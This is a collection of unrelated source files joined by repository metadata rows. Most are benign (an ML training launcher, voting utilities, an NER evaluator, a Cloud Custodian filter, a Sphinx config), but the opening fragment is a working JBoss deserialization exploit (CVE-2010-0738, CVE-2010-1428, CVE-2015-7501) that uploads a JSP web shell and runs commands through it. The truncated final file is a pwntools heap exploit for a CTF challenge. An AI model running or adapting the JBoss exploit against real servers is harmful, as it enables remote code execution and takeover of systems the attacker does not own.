self.rawdata = ">_< There are no requests and responses for special reasons"
self.r = "PoCWating"
self.method = "head"
self.data = ":-)"
try:
if CodeTest.VULN is None:
self.request = requests.head(self.url + self.path, data=self.data, headers=self.headers)
self.rawdata = dump.dump_all(self.request).decode('utf-8','ignore')
if r"jboss" in self.request.headers["Content-Type"]:
self.r = "PoCSuCCeSS"
CodeTest.verify.generic_output(self.r, self.pocname, self.method, self.rawdata, self.info)
else:
self.request = requests.post(self.url + self.path, data=self.payload_cve_2015_7501, headers=self.headers, timeout=TIMEOUT, verify=False)
self.cmd = urlencode({"ppp": CMD})
self.request = requests.get(self.url + "/jexinv4/jexinv4.jsp?" + self.cmd, headers=self.headers, timeout=TIMEOUT, verify=False)
time.sleep(2)
CodeTest.verify.generic_output(self.request.text, self.pocname, self.method, self.rawdata, self.info)
except requests.exceptions.Timeout as error:
CodeTest.verify.timeout_output(self.pocname)
except requests.exceptions.ConnectionError as error:
CodeTest.verify.connection_output(self.pocname)
except Exception as error:
CodeTest.verify.generic_output(str(error), self.pocname, self.method, self.rawdata, self.info)
print("""eg: http://119.3.36.68:9001/
+-------------------+------------------+-----+-----+-------------------------------------------------------------+
| Target type | Vuln Name | Poc | Exp | Impact Version && Vulnerability description |
+-------------------+------------------+-----+-----+-------------------------------------------------------------+
| RedHat JBoss | cve_2010_0738 | Y | Y | 4.2.0 - 4.3.0, jmx-console deserialization any files upload |
| RedHat JBoss | cve_2010_1428 | Y | Y | 4.2.0 - 4.3.0, web-console deserialization any files upload |
| RedHat JBoss | cve_2015_7501 | Y | Y | 5.x, 6.x, jmxinvokerservlet deserialization any file upload |
+-------------------+------------------+-----+-----+-------------------------------------------------------------+""")
def check(**kwargs):
    if CodeTest.VULN is None:
ExpRedHatJBoss = RedHatJBoss(_urlparse(kwargs['url']),"echo VuLnEcHoPoCSuCCeSS")
else:
ExpRedHatJBoss = RedHatJBoss(_urlparse(kwargs['url']),kwargs['cmd'])
if kwargs['pocname'] == "cve_2010_0738":
ExpRedHatJBoss.cve_2010_0738()
elif kwargs['pocname'] == "cve_2010_1428":
ExpRedHatJBoss.cve_2010_1428()
elif kwargs['pocname'] == "cve_2015_7501":
ExpRedHatJBoss.cve_2015_7501()
else:
ExpRedHatJBoss.cve_2010_0738()
ExpRedHatJBoss.cve_2010_1428()
ExpRedHatJBoss.cve_2015_7501() | [
"[email protected]"
] | |
b6470cf42404b1ad3249e48f109c35b861ee9b2f | ce68c14ee067a68ef50f2f7e7a3a8e6876b29c3e | /main.py | 199af54fb6c6c516838deea51a7fd0e147c7480c | [] | no_license | lowkey159357/vehicle_prj_vgg16 | 7bc186fa43ed2c4913698490f1460acbaa362c27 | 4f727f54f017d84dce2bedbf31b6a4f17b5c5c20 | refs/heads/master | 2020-03-25T20:18:50.005596 | 2018-08-14T06:27:36 | 2018-08-14T06:27:36 | 144,125,718 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,498 | py | #!/usr/bin/env python3
#coding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
def parse_args(check=True):
parser = argparse.ArgumentParser()
# train
parser.add_argument('--dataset_dir', type=str,default=' ')
parser.add_argument('--logs_train_dir', type=str, default=' ')
parser.add_argument('--checkpoint_dir', type=str, default=' ')
parser.add_argument('--checkpoint_exclude_scopes', type=str, default=' ')
parser.add_argument('--max_epoc', type=int, default=60)
parser.add_argument('--num_epoc', type=int, default=1)
parser.add_argument('--learning_rate', type=float, default=0.0001)
parser.add_argument('--num_train_img', type=int, default=43971)
parser.add_argument('--batch_size', type=int, default=16)
parser.add_argument('--number_of_classes', type=int,default=764)
parser.add_argument('--hide_prob', type=float, default = 0.10)
parser.add_argument('--sigma', type=float, default = 0.65)
# eval
parser.add_argument('--val_loop', type=int,default=256)
FLAGS, unparsed = parser.parse_known_args()
return FLAGS, unparsed
train_cmd = 'python ./train.py --dataset_dir={dataset_dir} --logs_train_dir={logs_train_dir} \
--checkpoint_dir={checkpoint_dir} --checkpoint_exclude_scopes={checkpoint_exclude_scopes} --num_epoc={num_epoc} \
--learning_rate={learning_rate} --num_train_img={num_train_img} \
--batch_size={batch_size} --number_of_classes={number_of_classes} --hide_prob={hide_prob} --sigma={sigma} '
eval_cmd = 'python ./eval.py --dataset_dir={dataset_dir} --checkpoint_dir={checkpoint_dir} \
--number_of_classes={number_of_classes} --sigma={sigma} --val_loop={val_loop} --batch_size={batch_size} '
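# Illustrative rendering of the templates above (all values are placeholders,
# not project defaults):
#   train_cmd.format(**{'dataset_dir': '/data', 'logs_train_dir': '/logs',
#                       'checkpoint_dir': '/ckpt', ...})
#   -> "python ./train.py --dataset_dir=/data --logs_train_dir=/logs ..."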
if __name__ == '__main__':
FLAGS, unparsed = parse_args()
print('current working dir [{0}]'.format(os.getcwd()))
w_d = os.path.dirname(os.path.abspath(__file__))
print('change wording dir to [{0}]'.format(w_d))
os.chdir(w_d)
for i in range(FLAGS.max_epoc):
print('***************************epock {}*********************************'.format(i))
# train 1 epoch
print('################ train ################')
p = os.popen(train_cmd.format(**{'dataset_dir': FLAGS.dataset_dir, 'logs_train_dir': FLAGS.logs_train_dir,
'checkpoint_dir': FLAGS.checkpoint_dir,'checkpoint_exclude_scopes': FLAGS.checkpoint_exclude_scopes,
'num_epoc': FLAGS.num_epoc,'learning_rate': FLAGS.learning_rate, 'num_train_img': FLAGS.num_train_img,
'batch_size': FLAGS.batch_size, 'number_of_classes': FLAGS.number_of_classes,
'hide_prob': FLAGS.hide_prob, 'sigma': FLAGS.sigma}))
for l in p:
print(l.strip())
# eval
print('################ eval ################')
p = os.popen(eval_cmd.format(**{'dataset_dir': FLAGS.dataset_dir, 'checkpoint_dir': FLAGS.logs_train_dir,
'number_of_classes':FLAGS.number_of_classes, 'sigma': FLAGS.sigma,
'val_loop': FLAGS.val_loop, 'batch_size': FLAGS.batch_size}))
for l in p:
print(l.strip())
| [
"[email protected]"
] | |
f63fe9e05ffcac73aadcdc96a5641051d9366134 | 54fd000e2e2ab7325358b64306b124e01d677472 | /utils.py | 05ecc36cf44a2d346b7d886660e1622de45efc2d | [
"MIT"
] | permissive | Zendelo/ProxyVotingSim | 0ee88057dc185cd28e4da63446947a0bb9b26754 | dae389030a1f0ec21d7842f68da49e31aad0bbc5 | refs/heads/master | 2021-08-08T21:34:07.617318 | 2017-11-09T18:26:44 | 2017-11-09T18:26:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,484 | py | from itertools import combinations
from random import randint, uniform
# Kendall tau distance between vectors v and u
def kendall_tau(v, u):
pairs = combinations(v, 2)
dist = 0
for x, y in pairs:
a = v.index(x) - v.index(y)
b = u.index(x) - u.index(y)
# if discordant (different signs)
if a * b < 0:
dist += 1
return dist
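# e.g. kendall_tau([1, 2, 3], [3, 2, 1]) == 3: all three pairs are ordered
# differently in the two rankings (a full reversal).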
# Borda voting rule: gives each option a score according to its rank and
# returns the options sorted by total score.
# Uniform noise is added to each score in order to avoid ties.
def borda_voting_rule(ballots, a):
scores = {}
for i in range(a):
scores[i] = uniform(0, 0.01)
for voter in ballots:
for i in range(a):
scores[voter.get_vote()[i]] += a - 1 - i
return sorted(scores, key=scores.__getitem__, reverse=True)
# Boyer-Moore majority vote algorithm applied per position; ties are broken
# randomly between {0,1}. Returns a single vector {0,1} of size k.
def bm_majority_vote(ballots, k):
result = []
for i in range(k):
m = None
count = 0
for agent in ballots:
if count == 0:
m = agent.get_vote()[i]
count = 1
elif m == agent.get_vote()[i]:
count += 1
else:
count -= 1
if count > 0:
result.append(m)
elif count < 0:
result.append(abs(1 - m))
else:
result.append(randint(0, 1))
return result
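# Minimal usage sketch, assuming each ballot exposes get_vote() returning a
# 0/1 vector of length k (the real agent class lives elsewhere in the project):
#   class FakeAgent:
#       def __init__(self, v): self.v = v
#       def get_vote(self): return self.v
#   bm_majority_vote([FakeAgent([1, 0]), FakeAgent([1, 1]), FakeAgent([0, 1])], 2)
#   -> [1, 1]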
| [
"[email protected]"
] | |
5620c7f96f4cb52ee75460418ccef2a3ab693171 | fb813a01c5cb15f9b2d703366d3ee8f68d935cbb | /Oblig3/ner_eval.py | cc6d4ac95ec06a30cad44b4759a2709cb177db8b | [
"MIT"
] | permissive | fabiorodp/IN5550_Neural_Methods_in_Natural_Language_Processing | 2c803446fff7868644b9d1351eba40775cdfaaa5 | 4d3b2ed56b56e016413ae1544e19ad2a2c0ef047 | refs/heads/main | 2023-07-27T20:50:36.595335 | 2021-09-06T14:30:55 | 2021-09-06T14:30:55 | 329,799,108 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,040 | py | import logging
from collections import namedtuple
from copy import deepcopy
# From https://github.com/davidsbatista/NER-Evaluation
logging.basicConfig(
format="%(asctime)s %(name)s %(levelname)s: %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
level="DEBUG",
)
Entity = namedtuple("Entity", "e_type start_offset end_offset")
class Evaluator:
def __init__(self, true, pred, tags):
""""""
if len(true) != len(pred):
raise ValueError("Number of predicted documents does not equal true")
self.true = true
self.pred = pred
self.tags = tags
# Setup dict into which metrics will be stored.
self.metrics_results = {
"correct": 0,
"incorrect": 0,
"partial": 0,
"missed": 0,
"spurious": 0,
"possible": 0,
"actual": 0,
"precision": 0,
"recall": 0,
}
# Copy results dict to cover the four schemes.
self.results = {
"strict": deepcopy(self.metrics_results),
"ent_type": deepcopy(self.metrics_results),
"partial": deepcopy(self.metrics_results),
"exact": deepcopy(self.metrics_results),
}
# Create an accumulator to store results
self.evaluation_agg_entities_type = {e: deepcopy(self.results) for e in tags}
def evaluate(self):
logging.info(
"Imported %s predictions for %s true examples",
len(self.pred),
len(self.true),
)
for true_ents, pred_ents in zip(self.true, self.pred):
# Check that the length of the true and predicted examples are the
# same. This must be checked here, because another error may not
# be thrown if the lengths do not match.
if len(true_ents) != len(pred_ents):
raise ValueError("Prediction length does not match true example length")
# Compute results for one message
tmp_results, tmp_agg_results = compute_metrics(
collect_named_entities(true_ents),
collect_named_entities(pred_ents),
self.tags,
)
# Cycle through each result and accumulate
# TODO: Combine these loops below:
for eval_schema in self.results:
for metric in self.results[eval_schema]:
self.results[eval_schema][metric] += tmp_results[eval_schema][
metric
]
# Calculate global precision and recall
self.results = compute_precision_recall_wrapper(self.results)
# Aggregate results by entity type
for e_type in self.tags:
for eval_schema in tmp_agg_results[e_type]:
for metric in tmp_agg_results[e_type][eval_schema]:
self.evaluation_agg_entities_type[e_type][eval_schema][
metric
] += tmp_agg_results[e_type][eval_schema][metric]
# Calculate precision recall at the individual entity level
self.evaluation_agg_entities_type[
e_type
] = compute_precision_recall_wrapper(
self.evaluation_agg_entities_type[e_type]
)
return self.results, self.evaluation_agg_entities_type
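# Minimal usage sketch (documents and tag names are illustrative):
#   true = [["B-PER", "I-PER", "O"]]
#   pred = [["B-PER", "I-PER", "O"]]
#   results, by_type = Evaluator(true, pred, tags=["PER"]).evaluate()
#   results["strict"]["correct"]  # counts exact span + type matches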
def collect_named_entities(tokens):
"""
Creates a list of Entity named-tuples, storing the entity type and the start and end
offsets of the entity.
:param tokens: a list of tags
:return: a list of Entity named-tuples
"""
named_entities = []
start_offset = None
end_offset = None
ent_type = None
for offset, token_tag in enumerate(tokens):
if token_tag == "O":
if ent_type is not None and start_offset is not None:
end_offset = offset - 1
named_entities.append(Entity(ent_type, start_offset, end_offset))
start_offset = None
end_offset = None
ent_type = None
elif ent_type is None:
ent_type = token_tag[2:]
start_offset = offset
elif ent_type != token_tag[2:] or (
ent_type == token_tag[2:] and token_tag[:1] == "B"
):
end_offset = offset - 1
named_entities.append(Entity(ent_type, start_offset, end_offset))
# start of a new entity
ent_type = token_tag[2:]
start_offset = offset
end_offset = None
# catches an entity that goes up until the last token
if ent_type is not None and start_offset is not None and end_offset is None:
named_entities.append(Entity(ent_type, start_offset, len(tokens) - 1))
return named_entities
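# For example (illustrative tags):
#   collect_named_entities(["B-PER", "I-PER", "O", "B-LOC"])
#   -> [Entity(e_type='PER', start_offset=0, end_offset=1),
#       Entity(e_type='LOC', start_offset=3, end_offset=3)]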
def compute_metrics(true_named_entities, pred_named_entities, tags):
eval_metrics = {
"correct": 0,
"incorrect": 0,
"partial": 0,
"missed": 0,
"spurious": 0,
"precision": 0,
"recall": 0,
}
# overall results
evaluation = {
"strict": deepcopy(eval_metrics),
"ent_type": deepcopy(eval_metrics),
"partial": deepcopy(eval_metrics),
"exact": deepcopy(eval_metrics),
}
# results by entity type
evaluation_agg_entities_type = {e: deepcopy(evaluation) for e in tags}
# keep track of entities that overlapped
true_which_overlapped_with_pred = []
# Subset into only the tags that we are interested in.
# NOTE: we remove the tags we don't want from both the predicted and the
# true entities. This covers the two cases where mismatches can occur:
#
# 1) Where the model predicts a tag that is not present in the true data
# 2) Where there is a tag in the true data that the model is not capable of
# predicting.
true_named_entities = [ent for ent in true_named_entities if ent.e_type in tags]
pred_named_entities = [ent for ent in pred_named_entities if ent.e_type in tags]
# go through each predicted named-entity
for pred in pred_named_entities:
found_overlap = False
# Check each of the potential scenarios in turn. See
# http://www.davidsbatista.net/blog/2018/05/09/Named_Entity_Evaluation/
# for scenario explanation.
# Scenario I: Exact match between true and pred
if pred in true_named_entities:
true_which_overlapped_with_pred.append(pred)
evaluation["strict"]["correct"] += 1
evaluation["ent_type"]["correct"] += 1
evaluation["exact"]["correct"] += 1
evaluation["partial"]["correct"] += 1
# for the agg. by e_type results
evaluation_agg_entities_type[pred.e_type]["strict"]["correct"] += 1
evaluation_agg_entities_type[pred.e_type]["ent_type"]["correct"] += 1
evaluation_agg_entities_type[pred.e_type]["exact"]["correct"] += 1
evaluation_agg_entities_type[pred.e_type]["partial"]["correct"] += 1
else:
# check for overlaps with any of the true entities
for true in true_named_entities:
pred_range = range(pred.start_offset, pred.end_offset)
true_range = range(true.start_offset, true.end_offset)
# Scenario IV: Offsets match, but entity type is wrong
if (
true.start_offset == pred.start_offset
and pred.end_offset == true.end_offset
and true.e_type != pred.e_type
):
# overall results
evaluation["strict"]["incorrect"] += 1
evaluation["ent_type"]["incorrect"] += 1
evaluation["partial"]["correct"] += 1
evaluation["exact"]["correct"] += 1
# aggregated by entity type results
evaluation_agg_entities_type[true.e_type]["strict"][
"incorrect"
] += 1
evaluation_agg_entities_type[true.e_type]["ent_type"][
"incorrect"
] += 1
evaluation_agg_entities_type[true.e_type]["partial"]["correct"] += 1
evaluation_agg_entities_type[true.e_type]["exact"]["correct"] += 1
true_which_overlapped_with_pred.append(true)
found_overlap = True
break
# check for an overlap i.e. not exact boundary match, with true entities
elif find_overlap(true_range, pred_range):
true_which_overlapped_with_pred.append(true)
# Scenario V: There is an overlap (but offsets do not match
# exactly), and the entity type is the same.
# 2.1 overlaps with the same entity type
if pred.e_type == true.e_type:
# overall results
evaluation["strict"]["incorrect"] += 1
evaluation["ent_type"]["correct"] += 1
evaluation["partial"]["partial"] += 1
evaluation["exact"]["incorrect"] += 1
# aggregated by entity type results
evaluation_agg_entities_type[true.e_type]["strict"][
"incorrect"
] += 1
evaluation_agg_entities_type[true.e_type]["ent_type"][
"correct"
] += 1
evaluation_agg_entities_type[true.e_type]["partial"][
"partial"
] += 1
evaluation_agg_entities_type[true.e_type]["exact"][
"incorrect"
] += 1
found_overlap = True
break
# Scenario VI: Entities overlap, but the entity type is
# different.
else:
# overall results
evaluation["strict"]["incorrect"] += 1
evaluation["ent_type"]["incorrect"] += 1
evaluation["partial"]["partial"] += 1
evaluation["exact"]["incorrect"] += 1
# aggregated by entity type results
# Results against the true entity
evaluation_agg_entities_type[true.e_type]["strict"][
"incorrect"
] += 1
evaluation_agg_entities_type[true.e_type]["partial"][
"partial"
] += 1
evaluation_agg_entities_type[true.e_type]["ent_type"][
"incorrect"
] += 1
evaluation_agg_entities_type[true.e_type]["exact"][
"incorrect"
] += 1
# Results against the predicted entity
# evaluation_agg_entities_type[pred.e_type]['strict']['spurious'] += 1
found_overlap = True
break
# Scenario II: Entities are spurious (i.e., over-generated).
if not found_overlap:
# Overall results
evaluation["strict"]["spurious"] += 1
evaluation["ent_type"]["spurious"] += 1
evaluation["partial"]["spurious"] += 1
evaluation["exact"]["spurious"] += 1
# Aggregated by entity type results
# NOTE: when pred.e_type is not found in tags
# or when it simply does not appear in the test set, then it is
# spurious, but it is not clear where to assign it at the tag
# level. In this case, it is applied to all target_tags
# found in this example. This will mean that the sum of the
# evaluation_agg_entities will not equal evaluation.
for true in tags:
evaluation_agg_entities_type[true]["strict"]["spurious"] += 1
evaluation_agg_entities_type[true]["ent_type"]["spurious"] += 1
evaluation_agg_entities_type[true]["partial"]["spurious"] += 1
evaluation_agg_entities_type[true]["exact"]["spurious"] += 1
# Scenario III: Entity was missed entirely.
for true in true_named_entities:
if true in true_which_overlapped_with_pred:
continue
else:
# overall results
evaluation["strict"]["missed"] += 1
evaluation["ent_type"]["missed"] += 1
evaluation["partial"]["missed"] += 1
evaluation["exact"]["missed"] += 1
# for the agg. by e_type
evaluation_agg_entities_type[true.e_type]["strict"]["missed"] += 1
evaluation_agg_entities_type[true.e_type]["ent_type"]["missed"] += 1
evaluation_agg_entities_type[true.e_type]["partial"]["missed"] += 1
evaluation_agg_entities_type[true.e_type]["exact"]["missed"] += 1
# Compute 'possible', 'actual' according to SemEval-2013 Task 9.1 on the
# overall results, and use these to calculate precision and recall.
for eval_type in evaluation:
evaluation[eval_type] = compute_actual_possible(evaluation[eval_type])
# Compute 'possible', 'actual', and precision and recall on entity level
# results. Start by cycling through the accumulated results.
for entity_type, entity_level in evaluation_agg_entities_type.items():
# Cycle through the evaluation types for each dict containing entity
# level results.
for eval_type in entity_level:
evaluation_agg_entities_type[entity_type][
eval_type
] = compute_actual_possible(entity_level[eval_type])
return evaluation, evaluation_agg_entities_type
def find_overlap(true_range, pred_range):
"""Find the overlap between two ranges
Find the overlap between two ranges. Return the overlapping values if
present, else return an empty set().
Examples:
>>> find_overlap((1, 2), (2, 3))
    {2}
>>> find_overlap((1, 2), (3, 4))
set()
"""
true_set = set(true_range)
pred_set = set(pred_range)
overlaps = true_set.intersection(pred_set)
return overlaps
def compute_actual_possible(results):
"""
Takes a result dict that has been output by compute metrics.
Returns the results dict with actual, possible populated.
When the results dicts is from partial or ent_type metrics, then
partial_or_type=True to ensure the right calculation is used for
calculating precision and recall.
"""
correct = results["correct"]
incorrect = results["incorrect"]
partial = results["partial"]
missed = results["missed"]
spurious = results["spurious"]
# Possible: number annotations in the gold-standard which contribute to the
# final score
possible = correct + incorrect + partial + missed
# Actual: number of annotations produced by the NER system
actual = correct + incorrect + partial + spurious
results["actual"] = actual
results["possible"] = possible
return results
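# e.g. correct=3, incorrect=1, partial=1, missed=2, spurious=1 gives
# possible = 3 + 1 + 1 + 2 = 7 and actual = 3 + 1 + 1 + 1 = 6.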
def compute_precision_recall(results, partial_or_type=False):
"""
Takes a result dict that has been output by compute metrics.
Returns the results dict with precison and recall populated.
When the results dicts is from partial or ent_type metrics, then
partial_or_type=True to ensure the right calculation is used for
calculating precision and recall.
"""
actual = results["actual"]
possible = results["possible"]
partial = results["partial"]
correct = results["correct"]
if partial_or_type:
precision = (correct + 0.5 * partial) / actual if actual > 0 else 0
recall = (correct + 0.5 * partial) / possible if possible > 0 else 0
else:
precision = correct / actual if actual > 0 else 0
recall = correct / possible if possible > 0 else 0
results["precision"] = precision
results["recall"] = recall
return results
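# e.g. with correct=3, partial=1, actual=6, possible=7 and partial_or_type=True:
#   precision = (3 + 0.5 * 1) / 6 ~= 0.583 and recall = (3 + 0.5 * 1) / 7 = 0.5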
def compute_precision_recall_wrapper(results):
"""
Wraps the compute_precision_recall function and runs on a dict of results
"""
results_a = {
key: compute_precision_recall(value, True)
for key, value in results.items()
if key in ["partial", "ent_type"]
}
results_b = {
key: compute_precision_recall(value)
for key, value in results.items()
if key in ["strict", "exact"]
}
results = {**results_a, **results_b}
return results
| [
"[email protected]"
] | |
f4129e0267f16805949a94670dee66a10c5ba43e | 9efca95a55cb4df52d895d42f1ec10331516a734 | /tools/c7n_gcp/c7n_gcp/filters/recommender.py | e2d2fd72b777c8c8fb89b9452f088c9e393b557f | [
"Apache-2.0"
] | permissive | cloud-custodian/cloud-custodian | 519e602abe00c642786441b64cc40857ef5bc9de | 27563cf4571040f923124e1acb2463f11e372225 | refs/heads/main | 2023-09-04T10:54:55.963703 | 2023-09-01T17:40:17 | 2023-09-01T17:40:17 | 52,837,350 | 3,327 | 1,096 | Apache-2.0 | 2023-09-14T14:03:30 | 2016-03-01T01:11:20 | Python | UTF-8 | Python | false | false | 4,693 | py | # Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
"""
GCP Recommender filters
"""
import json
from pathlib import Path
import jmespath
from c7n.exceptions import PolicyValidationError
from c7n.filters.core import Filter
from c7n.utils import local_session, type_schema
from c7n_gcp.provider import resources as gcp_resources
RECOMMENDER_DATA_PATH = Path(__file__).parent / "recommender.json"
_RECOMMENDER_DATA = None
def get_recommender_data():
global _RECOMMENDER_DATA
if _RECOMMENDER_DATA is None:
with open(RECOMMENDER_DATA_PATH) as fh:
_RECOMMENDER_DATA = json.load(fh)
return _RECOMMENDER_DATA
class RecommenderFilter(Filter):
"""Use GCP Resource Recommendations to filter resources
for a complete list and applicable resource types see
https://cloud.google.com/recommender/docs/recommenders
ie. find idle compute disks to snapshot and delete.
:example:
.. code-block:: yaml
policies:
- name: gcp-unused-disk
resource: gcp.disk
filters:
- type: recommend
id: google.compute.disk.IdleResourceRecommender
actions:
- snapshot
- delete
"""
schema = type_schema(
"recommend",
id={"type": "string"},
# state={'enum': ['ACTIVE', 'CLAIMED', 'SUCCEEDED', 'FAILED', 'DISMISSED']}
# sub_type={'enum': 'string'}
required=("id",),
)
schema_alias = True
annotation_key = 'c7n:recommend'
def get_permissions(self):
rec_id = self.data.get("id")
if not rec_id:
return []
prefix = get_recommender_data().get(rec_id, {}).get("permission_prefix")
if not prefix:
return []
return [prefix + ".get", prefix + ".list"]
def validate(self):
rtype = "gcp.%s" % self.manager.type
rec_id = self.data["id"]
all_recs = get_recommender_data()
if rec_id not in all_recs or all_recs[rec_id].get('resource', '') != rtype:
valid_ids = {r["id"] for r in all_recs.values() if r.get("resource") == rtype}
raise PolicyValidationError(
f"recommendation id:{rec_id} is not valid for {rtype}, valid: {valid_ids}"
)
self.rec_info = all_recs[rec_id]
def process(self, resources, event=None):
session = local_session(self.manager.session_factory)
recommendations = self.get_recommendations(session, resources)
return self.match_resources(recommendations, resources)
def get_recommendations(self, session, resources):
client = session.client(
"recommender", "v1", "projects.locations.recommenders.recommendations"
)
project = session.get_default_project()
regions = self.get_regions(resources)
recommends = []
for r in regions:
parent = (
f"projects/{project}/locations/{r}/recommenders/{self.rec_info['id']}"
)
for page in client.execute_paged_query("list", {"parent": parent}):
recommends.extend(page.get('recommendations', []))
return recommends
def match_resources(self, recommends, resources):
results = []
rec_query = jmespath.compile('content.operationGroups[].operations[].resource')
for r in recommends:
rids = rec_query.search(r)
for rid in list(rids):
# some resource operations are about creating new resources, ie snapshot disk
# before delete, remove those to focus on extant resources.
if "$" in rid:
rids.remove(rid)
matched = list(self.match_ids(rids, resources))
for m in matched:
m.setdefault(self.annotation_key, []).append(r)
results.extend(matched)
return results
def match_ids(self, rids, resources):
rids = [r.split("/", 3)[-1] for r in rids]
for r in resources:
for rid in rids:
if rid in r["name"] or rid in r["selfLink"]:
yield r
def get_regions(self, resources):
locator = self.manager.resource_type._get_location
return list(set([locator(r) for r in resources]))
@classmethod
def register_resources(klass, registry, resource_class):
data = get_recommender_data()
rtype = "gcp.%s" % resource_class.type
for rec in data.values():
if rec.get("resource") == rtype:
resource_class.filter_registry.register("recommend", klass)
gcp_resources.subscribe(RecommenderFilter.register_resources)
| [
"[email protected]"
] | |
2a7f8fd9506a71f0cabc75f143c62442adf259cd | af165d72ac206153c9b16499e88f9c9f30a69c9a | /studies/mixture_feasibility/optimization_analysis/expanded_set/extract_gradients.py | aab1a01f2538916681860cedb0b3f7f1977e620a | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | openforcefield/nistdataselection | bc4b443ec3377e9f7f953bcf6535118423ff96ea | d797d597f4ff528a7219d58daa8ef6508d438b24 | refs/heads/master | 2020-06-12T01:05:22.757026 | 2020-05-18T22:44:10 | 2020-05-18T22:44:10 | 194,144,523 | 3 | 0 | MIT | 2020-05-19T02:10:56 | 2019-06-27T18:28:23 | Python | UTF-8 | Python | false | false | 1,643 | py | import os
from glob import glob
from evaluator.properties import Density, EnthalpyOfMixing, EnthalpyOfVaporization
from nistdataselection.analysis.processing import extract_gradients
from nistdataselection.utils import SubstanceType
def main():
output_directory = "gradients"
os.makedirs(output_directory, exist_ok=True)
# Define the names of the performed studies.
study_names = [
"h_mix_rho_x",
"h_mix_rho_x_rho_pure",
"h_mix_rho_x_rho_pure_h_vap",
"rho_pure_h_vap",
]
# Define the names of the properties which were benchmarked.
property_types = [
(Density, SubstanceType.Pure),
(EnthalpyOfVaporization, SubstanceType.Pure),
(Density, SubstanceType.Binary),
(EnthalpyOfMixing, SubstanceType.Binary),
]
# Extract gradients for each of the different environments.
partitioned_directory = os.path.join("partitioned_data")
all_environments = set(
tuple(os.path.basename(x).split("_"))
for y in study_names
for x in glob(os.path.join(partitioned_directory, y, "*"))
)
environments = {
SubstanceType.Pure: [x for x in all_environments if len(x) == 1],
SubstanceType.Binary: [x for x in all_environments if len(x) == 2],
}
gradients_per_environment = extract_gradients(
partitioned_directory,
property_types,
study_names,
environments,
partition_by_composition=True,
)
gradients_per_environment.to_csv(
os.path.join(output_directory, "per_composition.csv"), index=False
)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
70e9f26eb50270b5fde47ec114dfef0cb5083e3c | 020cc6ee33ddb4f7c4864e6c3ca4f9d2fd7db8b2 | /docs_source/conf.py | 59c3fd9e82db206d036e6955fbee569c860deb4d | [
"MIT"
] | permissive | ajunlonglive/many_requests | 8324867fd21d17864c41f153680f142963f03362 | f80df66c8b5cd0f59b3ef31622a36e8ebd30094e | refs/heads/main | 2023-03-24T03:42:21.827985 | 2021-03-23T10:54:40 | 2021-03-23T10:54:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,258 | py | # Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('../'))
import sphinx_rtd_theme
# -- Project information -----------------------------------------------------
project = 'many_requests'
copyright = '2020, Josh Levy-Kramer. MIT license'
author = 'Josh Levy-Kramer'
# The full version, including alpha/beta/rc tags
release = 'v0.1.0'
# -- General configuration ---------------------------------------------------
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.viewcode',
'recommonmark',
"sphinx_rtd_theme",
"sphinx.ext.napoleon"
]
napoleon_google_docstring = True
napoleon_use_param = False
napoleon_use_ivar = True
napoleon_include_init_with_doc = True
autodoc_member_order = 'bysource'
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# Add markdown as a source suffix
source_suffix = {
'.rst': 'restructuredtext',
'.txt': 'markdown',
'.md': 'markdown',
}
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme' #'alabaster'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static'] | [
"[email protected]"
] | |
df52d8103305e042682cdf07e8594e0dfd1c6719 | 371748c34afaa0579bab10b2cd8fcc8414e2feb0 | /2019/TokyoWestern-CTF/astrisk_alloc/exploit.py | 6648c803833b7d90102365cc2e97da0a4ff1b457 | [] | no_license | HexRabbit/CTF-writeup | 51c27a521c58ab21ac7ba89d449a91e28e90ece2 | 4d90ebe8dce78c8aa0c3994afabf10bd6fa7103a | refs/heads/master | 2022-03-04T23:13:53.231339 | 2022-02-24T09:38:29 | 2022-02-24T09:38:29 | 144,137,043 | 26 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,030 | py | #!/usr/bin/env python
from pwn import *
context.arch = 'amd64'
context.terminal = ['tmux', 'neww']
context.log_level = 'debug'
#r = process('./asterisk_alloc', env={'LD_PRELOAD': './libc.so.6'})
r = remote('ast-alloc.chal.ctf.westerns.tokyo', 10001)
libc = ELF('./libc.so.6')
def malloc(n, s):
r.sendlineafter('choice: ', '1')
r.sendlineafter('Size: ', str(n))
r.sendafter('Data: ', s)
def calloc(n, s):
r.sendlineafter('choice: ', '2')
r.sendlineafter('Size: ', str(n))
r.sendafter('Data: ', s)
def realloc(n, s):
r.sendlineafter('choice: ', '3')
r.sendlineafter('Size: ', str(n))
if n != -1:
r.sendafter('Data: ', s)
def free(c):
r.sendlineafter('choice: ', '4')
r.sendlineafter('Which: ', c)
realloc(0x28, 'A')
free('r')
free('r')
# fail realloc to reset ptr to NULL
# overwrite next ptr onto fake chunk
realloc(-1, '')
realloc(0x28, '\x98')
# malloc size > tcache max size to get libc address
realloc(-1, '')
realloc(1400, 'A')
# calloc in advence
# to avoid "malloc(): memory corruption" if we calloc after we wrote _IO_write_base
calloc(0x200, 'A')
free('r')
realloc(-1, '')
# fake tcache chunk
